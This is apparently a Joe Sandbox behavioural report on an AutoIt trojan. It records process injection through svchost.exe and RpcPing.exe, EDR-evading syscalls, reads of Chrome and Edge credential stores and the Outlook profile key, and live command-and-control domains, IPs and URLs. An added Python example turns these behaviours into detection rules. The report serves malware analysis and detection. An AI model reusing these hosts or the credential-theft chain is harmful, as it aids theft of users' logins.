Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtTerminateThread: Direct from: 0x77382FCC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtClose: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe protection: read write
Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\RpcPing.exe | Thread register set: target process: 6244
Source: C:\Windows\SysWOW64\RpcPing.exe | Thread APC queued: target process: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 315D008
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007A8C93 LogonUserW, | 0_2_007A8C93
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00753B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_00753B4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00754A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00754A35
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B4EF5 mouse_event,0_2_007B4EF5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"Jump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007A81F7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007B4C03
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339488424.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339488424.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339488424.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0077886B cpuid 0_2_0077886B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007850D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_007850D7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00792230 GetUserNameW,0_2_00792230
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0078418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0078418A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00754AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00754AFE

            Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RpcPing.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Binary or memory string: WIN_81
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Binary or memory string: WIN_XP
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Binary or memory string: WIN_XPe
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Binary or memory string: WIN_VISTA
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Binary or memory string: WIN_7
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Binary or memory string: WIN_8
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
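The behaviour rows above describe a chain that a detection engineer can express as host telemetry rules: the sample starts svchost.exe with the sample's own command line and maps an execute/read/write section into it, svchost.exe maps into DUipWAeQLm.exe (living in a randomly named Program Files (x86) directory), that process starts RpcPing.exe, and RpcPing.exe maps into DUipWAeQLm.exe and firefox.exe, then reads the Chrome and Edge credential stores and the Outlook profile key. The following is an added example, not code from the Joe Sandbox report: it runs four rules over constructed events that mirror those rows. Image paths, file paths and the registry key are copied from the report; the event schema (type/pid/ppid/image/cmdline/target/protection/path/key), the pids, the chrome.exe control process and the function names are assumptions of this example.

```python
"""Rules for the injection chain and credential-store access reported for RpcPing.exe.

Added example; the EVENTS list is constructed to mirror this report's behaviour
rows, and its field names and pids are assumptions, not a Joe Sandbox or Sysmon schema.
"""
import re
from collections import defaultdict

SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
RANDOM_DIR_EXE = (r"C:\Program Files (x86)"
                  r"\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh"
                  r"\DUipWAeQLm.exe")
RPCPING = r"C:\Windows\SysWOW64\RpcPing.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"   # constructed benign control
CHROME_LOGIN = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"
EDGE_LOGIN = r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"
OUTLOOK_KEY = (r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Windows Messaging Subsystem\Profiles\Outlook" "\\")
RWX = "execute and read and write"

EVENTS = [  # constructed telemetry; pids are hypothetical
    {"type": "process_create", "pid": 1, "ppid": 0, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    # svchost.exe started with the sample's command line, then written to: hollowing
    {"type": "process_create", "pid": 2, "ppid": 1, "image": SVCHOST, "cmdline": f'"{SAMPLE}"'},
    {"type": "section_map", "pid": 1, "target": 2, "protection": RWX},
    {"type": "process_create", "pid": 8, "ppid": 0, "image": RANDOM_DIR_EXE, "cmdline": f'"{RANDOM_DIR_EXE}"'},
    {"type": "section_map", "pid": 2, "target": 8, "protection": RWX},
    {"type": "process_create", "pid": 9, "ppid": 8, "image": RPCPING, "cmdline": f'"{RPCPING}"'},
    {"type": "section_map", "pid": 9, "target": 8, "protection": RWX},
    {"type": "process_create", "pid": 10, "ppid": 9, "image": FIREFOX, "cmdline": f'"{FIREFOX}"'},
    {"type": "section_map", "pid": 9, "target": 10, "protection": RWX},
    {"type": "file_open", "pid": 9, "path": CHROME_LOGIN},
    {"type": "file_open", "pid": 9, "path": EDGE_LOGIN},
    {"type": "reg_open", "pid": 9, "key": OUTLOOK_KEY},
    {"type": "process_create", "pid": 11, "ppid": 0, "image": CHROME, "cmdline": f'"{CHROME}"'},
    {"type": "file_open", "pid": 11, "path": CHROME_LOGIN},   # a browser reading its own store
]

CRED_STORE = re.compile(
    r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*\\(Login Data|Cookies|Web Data|Local State)$", re.I)
CRED_STORE_OWNERS = {"chrome.exe", "msedge.exe"}
MAIL_PROFILE_KEY = "\\windows messaging subsystem\\profiles\\"
MAIL_PROFILE_OWNERS = {"outlook.exe"}
WINDOWS_BIN_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# a long, letters-only, mixed-case path component like the one in this report
RANDOM_COMPONENT = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])[A-Za-z]{24,}$")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def has_random_component(path):
    return any(RANDOM_COMPONENT.match(part) for part in path.split("\\"))


def exe_from_cmdline(cmdline):
    """Basename of the executable a command line claims to run, or None."""
    m = re.match(r'\s*"?([^"]*?\.exe)', cmdline, re.I)
    return basename(m.group(1)) if m else None


def analyze(events):
    """Return {pid: [finding, ...]} for every process that tripped a rule."""
    procs = {e["pid"]: e for e in events if e["type"] == "process_create"}
    findings = defaultdict(list)
    for e in events:
        pid, kind = e["pid"], e["type"]
        owner = basename(procs[pid]["image"]) if pid in procs else ""
        if kind == "process_create":
            claimed = exe_from_cmdline(e.get("cmdline", ""))
            if claimed and claimed != owner:
                findings[pid].append("image/cmdline mismatch (hollowed process?)")
            parent = procs.get(e["ppid"])
            if parent and has_random_component(parent["image"]) \
                    and e["image"].lower().startswith(WINDOWS_BIN_DIRS):
                findings[pid].append("system binary spawned from random-named directory")
        elif kind == "section_map":
            if e["target"] != pid and "execute" in e["protection"] and "write" in e["protection"]:
                findings[pid].append(f"rwx section mapped into pid {e['target']}")
        elif kind == "file_open":
            if CRED_STORE.search(e["path"]) and owner not in CRED_STORE_OWNERS:
                findings[pid].append("browser credential store read")
        elif kind == "reg_open":
            if MAIL_PROFILE_KEY in e["key"].lower() and owner not in MAIL_PROFILE_OWNERS:
                findings[pid].append("mail profile key read")
    return {pid: list(dict.fromkeys(f)) for pid, f in findings.items()}


def suspicious_chain(events):
    """Ancestry (root first) of the process with the most findings."""
    procs = {e["pid"]: e for e in events if e["type"] == "process_create"}
    findings = analyze(events)
    if not findings:
        return []
    pid = max(findings, key=lambda p: len(findings[p]))
    chain = []
    while pid in procs:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain[::-1]


if __name__ == "__main__":
    for pid, hits in analyze(EVENTS).items():
        print(pid, hits)
    print("chain:", " -> ".join(suspicious_chain(EVENTS)))
```

The image/cmdline rule fires on the svchost.exe instance because it was created with the sample's own path as its command line, which is what the "Process created" row above shows; the credential-store rule is keyed on the process that opens the file rather than on the file alone, so the chrome.exe control reading its own Login Data produces nothing.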

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007C6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007C6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (techniques listed per tactic, top to bottom; a leading digit string is the count badge shown beside a technique matched by the report's signatures; entries without one are the matrix's unmatched template techniques)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph (ID: 1466067; Sample: SecuriteInfo.com.Trojan.Aut...; Start date: 02/07/2024; Architecture: WINDOWS; Score: 100; bracketed numbers are the count badges drawn next to a process node)

Contacted hosts: www.motorsportgives.com; www.costmoon.com; www.6171nvuhb.rent
Sample-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures

Process tree:
SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe [4] (started)
  signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  svchost.exe (started)
    signatures: Maps a DLL or memory area into another process
    DUipWAeQLm.exe (injected)
      signatures: Found direct / indirect Syscall (likely to bypass EDR)
      RpcPing.exe [13] (started)
        signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        DUipWAeQLm.exe (injected)
          signatures: Found direct / indirect Syscall (likely to bypass EDR)
          network: www.6171nvuhb.rent 142.202.6.230, ports 49730, 49731, 49732 (REPRISE-HOSTINGUS, Reserved); www.motorsportgives.com 74.208.236.230, ports 49735, 49736, 49737 (ONEANDONE-ASBrauerstrasse48DE, United States); www.costmoon.com 74.208.236.38, ports 49727, 80 (ONEANDONE-ASBrauerstrasse48DE, United States)
        firefox.exe (started)

Source | Detection | Scanner | Label
SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | 47% | ReversingLabs | Win32.Trojan.Autoit
SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c | 0% | Avira URL Cloud | safe
http://www.motorsportgives.com/9qp3/ | 0% | Avira URL Cloud | safe
http://www.6171nvuhb.rent/hqcp/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://hm.baidu.com/hm.js?7758179a36947d1ed305205311f9e27d | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
http://www.motorsportgives.com | 0% | Avira URL Cloud | safe
http://www.costmoon.com/9m56/?Stux7=wSNNrhltoDErcnEw+GwIxBUk+E+vX1/TDY+0HSDY/xjQqFM+lgiwoO4LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPNkNvcw4gdSknrLieRXJ4XwgsEWF+LJyDECQspbYqq9pNrRLiTEI=&YF9Df=_VBD7fO8YfupmT | 0% | Avira URL Cloud | safe
https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6 | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://aaa.za1.bztqk.cn/123.html | 0% | Avira URL Cloud | safe
http://www.6171nvuhb.rent/hqcp/?Stux7=a7ZQHf8WLvhHVBver5nOwZih6r/S4XIGgVvybuFCKLHzqS2zk6yuhV2s1hLkbw5zmPfcdtbcw9raqNmLcm/5Ggyq9qBeDFk3p2MLA1pm9c8F5HyDpkyVADePZbSIOvXG2KyhUgY=&YF9Df=_VBD7fO8YfupmT | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.costmoon.com | 74.208.236.38 | true | true | | unknown
www.motorsportgives.com | 74.208.236.230 | true | true | | unknown
www.6171nvuhb.rent | 142.202.6.230 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.6171nvuhb.rent/hqcp/ | true | Avira URL Cloud: safe | unknown
http://www.motorsportgives.com/9qp3/ | true | Avira URL Cloud: safe | unknown
